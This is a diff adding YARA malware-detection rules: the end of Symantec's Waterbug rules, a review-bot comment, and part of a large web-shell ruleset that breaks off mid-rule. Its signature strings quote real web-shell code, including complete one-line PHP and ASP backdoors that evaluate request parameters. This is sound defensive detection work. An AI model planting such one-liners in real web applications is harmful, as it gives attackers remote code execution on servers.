+		description = "Symantec Waterbug Attack - FA malware variant"
+		author = "Symantec Security Response"
+		date = "22.01.2015"
+		reference = "http://t.co/rF35OaAXrl"
+	strings:
+		$mz = "MZ"
+		$string1 = "C:\\proj\\drivers\\fa _ 2009\\objfre\\i386\\atmarpd.pdb"
+		$string2 = "d:\\proj\\cn\\fa64\\"
+		$string3 = "sengoku_Win32.sys\x00"
+		$string4 = "rk_ntsystem.c"
+		$string5 = "\\uroboros\\"
+		$string6 = "shell.{F21EDC09-85D3-4eb9-915F-1AFA2FF28153}"
+	condition:
+		($mz at 0) and (any of ($string*))
+}
+
+
+rule WaterBug_sav {
+	meta: 
+		description = "Symantec Waterbug Attack - SAV Malware"
+		author = "Symantec Security Response"
+		date = "22.01.2015"
+		reference = "http://t.co/rF35OaAXrl" 	
+	strings:
+		$mz = "MZ"
+		$code1a = { 8B 75 18 31 34 81 40 3B C2 72 F5 33 F6 39 7D 14 76 1B 8A 04 0E 88 04 0F 6A 0F 33 D2 8B C7 5B F7 F3 85 D2 75 01 }
+		$code1b = { 8B 45 F8 40 89 45 F8 8B 45 10 C1 E8 02 39 45 F8 73 17 8B 45 F8 8B 4D F4 8B 04 81 33 45 20 8B 4D F8 8B 55 F4 89 04 8A EB D7 83 65 F8 00 83 65 EC 00 EB 0E 8B 45 F8 40 89 45 F8 8B 45 EC 40 89 45 EC 8B 45 EC	3B 45 10 73 27 8B 45 F4 03 45 F8 8B 4D F4 03 4D EC 8A 09 88 08 8B 45 F8 33 D2 6A 0F 59 F7 F1 85 D2 75 07 }
+		$code1c = { 8A 04 0F 88 04 0E 6A 0F 33 D2 8B C6 5B F7 F3 85 D2 75 01 47 8B 45 14 46 47 3B F8 72 E3 EB 04 C6 04 08 00 48 3B C6 73 F7 33 C0 C1 EE 02 74 0B 8B 55 18 31 14 81 40 3B C6 72 F5 }
+		$code2 =  { 29 5D 0C 8B D1 C1 EA 05 2B CA 8B 55 F4 2B C3 3D 00 00 00 01 89 0F 8B 4D 10 8D 94 91 00 03 00 00 73 17 8B 7D F8 8B 4D 0C 0F B6 3F C1 E1 08 0B CF C1 E0 08 FF 45 F8 89 4D 0C 8B 0A 8B F8 C1 EF 0B}
+	condition:
+		($mz at 0) and (($code1a or $code1b or $code1c) and $code2) 
+}
+
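Review bot: In `WaterBug_wipbot_2013_core`, `$code3` and `$code4` are declared on one line, which hides `$code4` from a reader and from line-based diffs; split them onto separate lines. The `$mz = "MZ"` / `$mz at 0` idiom used in three rules works but adds a two-byte string to the scan; `uint16(0) == 0x5A4D` expresses the same PE guard without a string match. The rule names say `2013` while their descriptions say `Trojan.Wipbot 2014`, so one of the two is wrong and should be reconciled, and every `reference` is a `t.co` short link that should be replaced by the Symantec report URL.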
diff --git a/malware/Webshell-shell.yar b/malware/Webshell-shell.yar
new file mode 100644
index 0000000..90edf4f
--- /dev/null
+++ b/malware/Webshell-shell.yar
@@ -0,0 +1,7971 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Weevely_Webshell {
+	meta:
+		description = "Weevely Webshell - Generic Rule - heavily scrambled tiny web shell"
+		author = "Florian Roth"
+		reference = "http://www.ehacking.net/2014/12/weevely-php-stealth-web-backdoor-kali.html"
+		date = "2014/12/14"
+		score = 60
+	strings:
+		$php = "<?php" ascii
+		$s0 = /\$[a-z]{4} = \$[a-z]{4}\("[a-z][a-z]?",[\s]?"",[\s]?"/ ascii
+		$s1 = /\$[a-z]{4} = str_replace\("[a-z][a-z]?","","/ ascii
+		$s2 = /\$[a-z]{4}\.\$[a-z]{4}\.\$[a-z]{4}\.\$[a-z]{4}\)\)\); \$[a-z]{4}\(\);/ ascii
+		$s4 = /\$[a-z]{4}="[a-zA-Z0-9]{70}/ ascii
+	condition:
+		$php at 0 and all of ($s*) and filesize > 570 and filesize < 800
+}
+
+rule webshell_h4ntu_shell_powered_by_tsoi_ {
+	meta:
+		description = "Web Shell - file h4ntu shell [powered by tsoi].php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "06ed0b2398f8096f1bebf092d0526137"
+	strings:
+		$s0 = "  <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>Server Adress:</b"
+		$s3 = "  <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><b>User Info:</b> ui"
+		$s4 = "    <TD><DIV STYLE=\"font-family: verdana; font-size: 10px;\"><?= $info ?>: <?= "
+		$s5 = "<INPUT TYPE=\"text\" NAME=\"cmd\" value=\"<?php echo stripslashes(htmlentities($"
+	condition:
+		all of them
+}
+rule webshell_PHP_sql {
+	meta:
+		description = "Web Shell - file sql.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "2cf20a207695bbc2311a998d1d795c35"
+	strings:
+		$s0 = "$result=mysql_list_tables($db) or die (\"$h_error<b>\".mysql_error().\"</b>$f_"
+		$s4 = "print \"<a href=\\\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&"
+	condition:
+		all of them
+}
+rule webshell_PHP_a {
+	meta:
+		description = "Web Shell - file a.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "e3b461f7464d81f5022419d87315a90d"
+	strings:
+		$s1 = "echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\""
+		$s2 = "echo \"<option value=\\\"$work_dir\\\" selected>Current Directory</option>"
+		$s4 = "<input name=\"submit_btn\" type=\"submit\" value=\"Execute Command\"></p> " fullword
+	condition:
+		2 of them
+}
+rule webshell_iMHaPFtp_2 {
+	meta:
+		description = "Web Shell - file iMHaPFtp.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "12911b73bc6a5d313b494102abcf5c57"
+	strings:
+		$s8 = "if ($l) echo '<a href=\"' . $self . '?action=permission&amp;file=' . urlencode($"
+		$s9 = "return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAA"
+	condition:
+		1 of them
+}
+rule webshell_Jspspyweb {
+	meta:
+		description = "Web Shell - file Jspspyweb.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "4e9be07e95fff820a9299f3fb4ace059"
+	strings:
+		$s0 = "      out.print(\"<tr><td width='60%'>\"+strCut(convertPath(list[i].getPath()),7"
+		$s3 = "  \"reg add \\\"HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control"
+	condition:
+		all of them
+}
+rule webshell_Safe_Mode_Bypass_PHP_4_4_2_and_PHP_5_1_2 {
+	meta:
+		description = "Web Shell - file Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "49ad9117c96419c35987aaa7e2230f63"
+	strings:
+		$s0 = "die(\"\\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\\n"
+		$s1 = "Mode Shell v1.0</font></span></a></font><font face=\"Webdings\" size=\"6\" color"
+	condition:
+		1 of them
+}
+rule webshell_SimAttacker_Vrsion_1_0_0_priv8_4_My_friend {
+	meta:
+		description = "Web Shell - file SimAttacker - Vrsion 1.0.0 - priv8 4 My friend.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "089ff24d978aeff2b4b2869f0c7d38a3"
+	strings:
+		$s2 = "echo \"<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><fo"
+		$s3 = "fputs ($fp ,\"\\n*********************************************\\nWelcome T0 Sim"
+	condition:
+		1 of them
+}
+rule webshell_phpshell_2_1_pwhash {
+	meta:
+		description = "Web Shell - file pwhash.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "ba120abac165a5a30044428fac1970d8"
+	strings:
+		$s1 = "<tt>&nbsp;</tt>\" (space), \"<tt>[</tt>\" (left bracket), \"<tt>|</tt>\" (pi"
+		$s3 = "word: \"<tt>null</tt>\", \"<tt>yes</tt>\", \"<tt>no</tt>\", \"<tt>true</tt>\","
+	condition:
+		1 of them
+}
+rule webshell_PHPRemoteView {
+	meta:
+		description = "Web Shell - file PHPRemoteView.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "29420106d9a81553ef0d1ca72b9934d9"
+	strings:
+		$s2 = "<input type=submit value='\".mm(\"Delete all dir/files recursive\").\" (rm -fr)'"
+		$s4 = "<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u"
+	condition:
+		1 of them
+}
+rule webshell_jsp_12302 {
+	meta:
+		description = "Web Shell - file 12302.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "a3930518ea57d899457a62f372205f7f"
+	strings:
+		$s0 = "</font><%out.print(request.getRealPath(request.getServletPath())); %>" fullword
+		$s1 = "<%@page import=\"java.io.*,java.util.*,java.net.*\"%>" fullword
+		$s4 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""
+	condition:
+		all of them
+}
+rule webshell_caidao_shell_guo {
+	meta:
+		description = "Web Shell - file guo.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "9e69a8f499c660ee0b4796af14dc08f0"
+	strings:
+		$s0 = "<?php ($www= $_POST['ice'])!"
+		$s1 = "@preg_replace('/ad/e','@'.str_rot13('riny').'($ww"
+	condition:
+		1 of them
+}
+rule webshell_PHP_redcod {
+	meta:
+		description = "Web Shell - file redcod.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "5c1c8120d82f46ff9d813fbe3354bac5"
+	strings:
+		$s0 = "H8p0bGFOEy7eAly4h4E4o88LTSVHoAglJ2KLQhUw" fullword
+		$s1 = "HKP7dVyCf8cgnWFy8ocjrP5ffzkn9ODroM0/raHm" fullword
+	condition:
+		all of them
+}
+rule webshell_remview_fix {
+	meta:
+		description = "Web Shell - file remview_fix.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "a24b7c492f5f00e2a19b0fa2eb9c3697"
+	strings:
+		$s4 = "<a href='$self?c=delete&c2=$c2&confirm=delete&d=\".urlencode($d).\"&f=\".u"
+		$s5 = "echo \"<P><hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n"
+	condition:
+		1 of them
+}
+rule webshell_asp_cmd {
+	meta:
+		description = "Web Shell - file cmd.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "895ca846858c315a3ff8daa7c55b3119"
+	strings:
+		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
+		$s1 = "Set oFileSys = Server.CreateObject(\"Scripting.FileSystemObject\")" fullword
+		$s3 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword
+	condition:
+		1 of them
+}
+rule webshell_php_sh_server {
+	meta:
+		description = "Web Shell - file server.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 50
+		hash = "d87b019e74064aa90e2bb143e5e16cfa"
+	strings:
+		$s0 = "eval(getenv('HTTP_CODE'));" fullword
+	condition:
+		all of them
+}
+rule webshell_PH_Vayv_PH_Vayv {
+	meta:
+		description = "Web Shell - file PH Vayv.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "35fb37f3c806718545d97c6559abd262"
+	strings:
+		$s0 = "style=\"BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px in"
+		$s4 = "<font color=\"#858585\">SHOPEN</font></a></font><font face=\"Verdana\" style"
+	condition:
+		1 of them
+}
+rule webshell_caidao_shell_ice {
+	meta:
+		description = "Web Shell - file ice.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "6560b436d3d3bb75e2ef3f032151d139"
+	strings:
+		$s0 = "<%eval request(\"ice\")%>" fullword
+	condition:
+		all of them
+}
+rule webshell_cihshell_fix {
+	meta:
+		description = "Web Shell - file cihshell_fix.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "3823ac218032549b86ee7c26f10c4cb5"
+	strings:
+		$s7 = "<tr style='background:#242424;' ><td style='padding:10px;'><form action='' encty"
+		$s8 = "if (isset($_POST['mysqlw_host'])){$dbhost = $_POST['mysqlw_host'];} else {$dbhos"
+	condition:
+		1 of them
+}
+rule webshell_asp_shell {
+	meta:
+		description = "Web Shell - file shell.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "e63f5a96570e1faf4c7b8ca6df750237"
+	strings:
+		$s7 = "<input type=\"submit\" name=\"Send\" value=\"GO!\">" fullword
+		$s8 = "<TEXTAREA NAME=\"1988\" ROWS=\"18\" COLS=\"78\"></TEXTAREA>" fullword
+	condition:
+		all of them
+}
+rule webshell_Private_i3lue {
+	meta:
+		description = "Web Shell - file Private-i3lue.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "13f5c7a035ecce5f9f380967cf9d4e92"
+	strings:
+		$s8 = "case 15: $image .= \"\\21\\0\\"
+	condition:
+		all of them
+}
+rule webshell_php_up {
+	meta:
+		description = "Web Shell - file up.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "7edefb8bd0876c41906f4b39b52cd0ef"
+	strings:
+		$s0 = "copy($HTTP_POST_FILES['userfile']['tmp_name'], $_POST['remotefile']);" fullword
+		$s3 = "if(is_uploaded_file($HTTP_POST_FILES['userfile']['tmp_name'])) {" fullword
+		$s8 = "echo \"Uploaded file: \" . $HTTP_POST_FILES['userfile']['name'];" fullword
+	condition:
+		2 of them
+}
+rule webshell_Mysql_interface_v1_0 {
+	meta:
+		description = "Web Shell - file Mysql interface v1.0.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "a12fc0a3d31e2f89727b9678148cd487"
+	strings:
+		$s0 = "echo \"<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\\\"return"
+	condition:
+		all of them
+}
+rule webshell_php_s_u {
+	meta:
+		description = "Web Shell - file s-u.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "efc7ba1a4023bcf40f5e912f1dd85b5a"
+	strings:
+		$s6 = "<a href=\"?act=do\"><font color=\"red\">Go Execute</font></a></b><br /><textarea"
+	condition:
+		all of them
+}
+rule webshell_phpshell_2_1_config {
+	meta:
+		description = "Web Shell - file config.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "bd83144a649c5cc21ac41b505a36a8f3"
+	strings:
+		$s1 = "; (choose good passwords!).  Add uses as simple 'username = \"password\"' lines." fullword
+	condition:
+		all of them
+}
+rule webshell_asp_EFSO_2 {
+	meta:
+		description = "Web Shell - file EFSO_2.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "a341270f9ebd01320a7490c12cb2e64c"
+	strings:
+		$s0 = "%8@#@&P~,P,PP,MV~4BP^~,NS~m~PXc3,_PWbSPU W~~[u3Fffs~/%@#@&~~,PP~~,M!PmS,4S,mBPNB"
+	condition:
+		all of them
+}
+rule webshell_jsp_up {
+	meta:
+		description = "Web Shell - file up.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "515a5dd86fe48f673b72422cccf5a585"
+	strings:
+		$s9 = "// BUG: Corta el fichero si es mayor de 640Ks" fullword
+	condition:
+		all of them
+}
+rule webshell_NetworkFileManagerPHP {
+	meta:
+		description = "Web Shell - file NetworkFileManagerPHP.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "acdbba993a5a4186fd864c5e4ea0ba4f"
+	strings:
+		$s9 = "  echo \"<br><center>All the data in these tables:<br> \".$tblsv.\" were putted "
+	condition:
+		all of them
+}
+rule webshell_Server_Variables {
+	meta:
+		description = "Web Shell - file Server Variables.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "47fb8a647e441488b30f92b4d39003d7"
+	strings:
+		$s7 = "<% For Each Vars In Request.ServerVariables %>" fullword
+		$s9 = "Variable Name</B></font></p>" fullword
+	condition:
+		all of them
+}
+rule webshell_caidao_shell_ice_2 {
+	meta:
+		description = "Web Shell - file ice.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "1d6335247f58e0a5b03e17977888f5f2"
+	strings:
+		$s0 = "<?php ${${eval($_POST[ice])}};?>" fullword
+	condition:
+		all of them
+}
+rule webshell_caidao_shell_mdb {
+	meta:
+		description = "Web Shell - file mdb.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "fbf3847acef4844f3a0d04230f6b9ff9"
+	strings:
+		$s1 = "<% execute request(\"ice\")%>a " fullword
+	condition:
+		all of them
+}
+rule webshell_jsp_guige {
+	meta:
+		description = "Web Shell - file guige.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "2c9f2dafa06332957127e2c713aacdd2"
+	strings:
+		$s0 = "if(damapath!=null &&!damapath.equals(\"\")&&content!=null"
+	condition:
+		all of them
+}
+rule webshell_phpspy2010 {
+	meta:
+		description = "Web Shell - file phpspy2010.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "14ae0e4f5349924a5047fed9f3b105c5"
+	strings:
+		$s3 = "eval(gzinflate(base64_decode("
+		$s5 = "//angel" fullword
+		$s8 = "$admin['cookiedomain'] = '';" fullword
+	condition:
+		all of them
+}
+rule webshell_asp_ice {
+	meta:
+		description = "Web Shell - file ice.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "d141e011a92f48da72728c35f1934a2b"
+	strings:
+		$s0 = "D,'PrjknD,J~[,EdnMP[,-4;DS6@#@&VKobx2ldd,'~JhC"
+	condition:
+		all of them
+}
+rule webshell_drag_system {
+	meta:
+		description = "Web Shell - file system.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "15ae237cf395fb24cf12bff141fb3f7c"
+	strings:
+		$s9 = "String sql = \"SELECT * FROM DBA_TABLES WHERE TABLE_NAME not like '%$%' and num_"
+	condition:
+		all of them
+}
+rule webshell_DarkBlade1_3_asp_indexx {
+	meta:
+		description = "Web Shell - file indexx.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "b7f46693648f534c2ca78e3f21685707"
+	strings:
+		$s3 = "Const strs_toTransform=\"command|Radmin|NTAuThenabled|FilterIp|IISSample|PageCou"
+	condition:
+		all of them
+}
+rule webshell_phpshell3 {
+	meta:
+		description = "Web Shell - file phpshell3.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "76117b2ee4a7ac06832d50b2d04070b8"
+	strings:
+		$s2 = "<input name=\"nounce\" type=\"hidden\" value=\"<?php echo $_SESSION['nounce'];"
+		$s5 = "<p>Username: <input name=\"username\" type=\"text\" value=\"<?php echo $userna"
+		$s7 = "$_SESSION['output'] .= \"cd: could not change to: $new_dir\\n\";" fullword
+	condition:
+		2 of them
+}
+rule webshell_jsp_hsxa {
+	meta:
+		description = "Web Shell - file hsxa.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "d0e05f9c9b8e0b3fa11f57d9ab800380"
+	strings:
+		$s0 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%><jsp:directive.page import=\"ja"
+	condition:
+		all of them
+}
+rule webshell_jsp_utils {
+	meta:
+		description = "Web Shell - file utils.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "9827ba2e8329075358b8e8a53e20d545"
+	strings:
+		$s0 = "ResultSet r = c.getMetaData().getTables(null, null, \"%\", t);" fullword
+		$s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z"
+	condition:
+		all of them
+}
+rule webshell_asp_01 {
+	meta:
+		description = "Web Shell - file 01.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 50
+		hash = "61a687b0bea0ef97224c7bd2df118b87"
+	strings:
+		$s0 = "<%eval request(\"pass\")%>" fullword
+	condition:
+		all of them
+}
+rule webshell_asp_404 {
+	meta:
+		description = "Web Shell - file 404.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "d9fa1e8513dbf59fa5d130f389032a2d"
+	strings:
+		$s0 = "lFyw6pd^DKV^4CDRWmmnO1GVKDl:y& f+2"
+	condition:
+		all of them
+}
+rule webshell_webshell_cnseay02_1 {
+	meta:
+		description = "Web Shell - file webshell-cnseay02-1.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "95fc76081a42c4f26912826cb1bd24b1"
+	strings:
+		$s0 = "(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU"
+	condition:
+		all of them
+}
+rule webshell_php_fbi {
+	meta:
+		description = "Web Shell - file fbi.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "1fb32f8e58c8deb168c06297a04a21f1"
+	strings:
+		$s7 = "erde types','Getallen','Datum en tijd','Tekst','Binaire gegevens','Netwerk','Geo"
+	condition:
+		all of them
+}
+rule webshell_B374kPHP_B374k {
+	meta:
+		description = "Web Shell - file B374k.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "bed7388976f8f1d90422e8795dff1ea6"
+	strings:
+		$s0 = "Http://code.google.com/p/b374k-shell" fullword
+		$s1 = "$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'"
+		$s3 = "Jayalah Indonesiaku & Lyke @ 2013" fullword
+		$s4 = "B374k Vip In Beautify Just For Self" fullword
+	condition:
+		1 of them
+}
+rule webshell_cmd_asp_5_1 {
+	meta:
+		description = "Web Shell - file cmd-asp-5.1.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "8baa99666bf3734cbdfdd10088e0cd9f"
+	strings:
+		$s9 = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword
+	condition:
+		all of them
+}
+rule webshell_php_dodo_zip {
+	meta:
+		description = "Web Shell - file zip.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "b7800364374077ce8864796240162ad5"
+	strings:
+		$s0 = "$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x"
+		$s3 = "$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
+	condition:
+		all of them
+}
+rule webshell_aZRaiLPhp_v1_0 {
+	meta:
+		description = "Web Shell - file aZRaiLPhp v1.0.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "26b2d3943395682e36da06ed493a3715"
+	strings:
+		$s5 = "echo \" <font color='#0000FF'>CHMODU \".substr(base_convert(@fileperms($"
+		$s7 = "echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo"
+	condition:
+		all of them
+}
+rule webshell_php_list {
+	meta:
+		description = "Web Shell - file list.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "922b128ddd90e1dc2f73088956c548ed"
+	strings:
+		$s1 = "// list.php = Directory & File Listing" fullword
+		$s2 = "    echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena"
+		$s9 = "// by: The Dark Raver" fullword
+	condition:
+		1 of them
+}
+rule webshell_ironshell {
+	meta:
+		description = "Web Shell - file ironshell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "8bfa2eeb8a3ff6afc619258e39fded56"
+	strings:
+		$s4 = "print \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\""
+		$s8 = "print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di"
+	condition:
+		all of them
+}
+rule webshell_caidao_shell_404 {
+	meta:
+		description = "Web Shell - file 404.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "ee94952dc53d9a29bdf4ece54c7a7aa7"
+	strings:
+		$s0 = "<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('St"
+	condition:
+		all of them
+}
+rule webshell_ASP_aspydrv {
+	meta:
+		description = "Web Shell - file aspydrv.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "de0a58f7d1e200d0b2c801a94ebce330"
+	strings:
+		$s3 = "<%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thi"
+	condition:
+		all of them
+}
+rule webshell_jsp_web {
+	meta:
+		description = "Web Shell - file web.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "4bc11e28f5dccd0c45a37f2b541b2e98"
+	strings:
+		$s0 = "<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%String t=request."
+	condition:
+		all of them
+}
+rule webshell_mysqlwebsh {
+	meta:
+		description = "Web Shell - file mysqlwebsh.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "babfa76d11943a22484b3837f105fada"
+	strings:
+		$s3 = " <TR><TD bgcolor=\"<? echo (!$CONNECT && $action == \"chparam\")?\"#660000\":\"#"
+	condition:
+		all of them
+}
+rule webshell_jspShell {
+	meta:
+		description = "Web Shell - file jspShell.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "0d5b5a17552254be6c1c8f1eb3a5fdc1"
+	strings:
+		$s0 = "<input type=\"checkbox\" name=\"autoUpdate\" value=\"AutoUpdate\" on"
+		$s1 = "onblur=\"document.shell.autoUpdate.checked= this.oldValue;"
+	condition:
+		all of them
+}
+rule webshell_Dx_Dx {
+	meta:
+		description = "Web Shell - file Dx.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "9cfe372d49fe8bf2fac8e1c534153d9b"
+	strings:
+		$s1 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
+		$s9 = "class=linelisting><nobr>POST (php eval)</td><"
+	condition:
+		1 of them
+}
+rule webshell_asp_ntdaddy {
+	meta:
+		description = "Web Shell - file ntdaddy.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "c5e6baa5d140f73b4e16a6cfde671c68"
+	strings:
+		$s9 =  "if  FP  =  \"RefreshFolder\"  or  "
+		$s10 = "request.form(\"cmdOption\")=\"DeleteFolder\"  "
+	condition:
+		1 of them
+}
+rule webshell_MySQL_Web_Interface_Version_0_8 {
+	meta:
+		description = "Web Shell - file MySQL Web Interface Version 0.8.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "36d4f34d0a22080f47bb1cb94107c60f"
+	strings:
+		$s2 = "href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>"
+	condition:
+		all of them
+}
+rule webshell_elmaliseker_2 {
+	meta:
+		description = "Web Shell - file elmaliseker.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "b32d1730d23a660fd6aa8e60c3dc549f"
+	strings:
+		$s1 = "<td<%if (FSO.GetExtensionName(path & \"\\\" & oFile.Name)=\"lnk\") or (FSO.GetEx"
+		$s6 = "<input type=button value=Save onclick=\"EditorCommand('Save')\"> <input type=but"
+	condition:
+		all of them
+}
+rule webshell_ASP_RemExp {
+	meta:
+		description = "Web Shell - file RemExp.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "aa1d8491f4e2894dbdb91eec1abc2244"
+	strings:
+		$s0 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=SubFolder.Name%>\"> <a href= \"<%=Reques"
+		$s1 = "Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal"
+	condition:
+		all of them
+}
+rule webshell_jsp_list1 {
+	meta:
+		description = "Web Shell - file list1.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "8d9e5afa77303c9c01ff34ea4e7f6ca6"
+	strings:
+		$s1 = "case 's':ConnectionDBM(out,encodeChange(request.getParameter(\"drive"
+		$s9 = "return \"<a href=\\\"javascript:delFile('\"+folderReplace(file)+\"')\\\""
+	condition:
+		all of them
+}
+rule webshell_phpkit_1_0_odd {
+	meta:
+		description = "Web Shell - file odd.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "594d1b1311bbef38a0eb3d6cbb1ab538"
+	strings:
+		$s0 = "include('php://input');" fullword
+		$s1 = "// No eval() calls, no system() calls, nothing normally seen as malicious." fullword
+		$s2 = "ini_set('allow_url_include, 1'); // Allow url inclusion in this script" fullword
+	condition:
+		all of them
+}
+rule webshell_jsp_123 {
+	meta:
+		description = "Web Shell - file 123.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "c691f53e849676cac68a38d692467641"
+	strings:
+		$s0 = "<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7"
+		$s3 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""
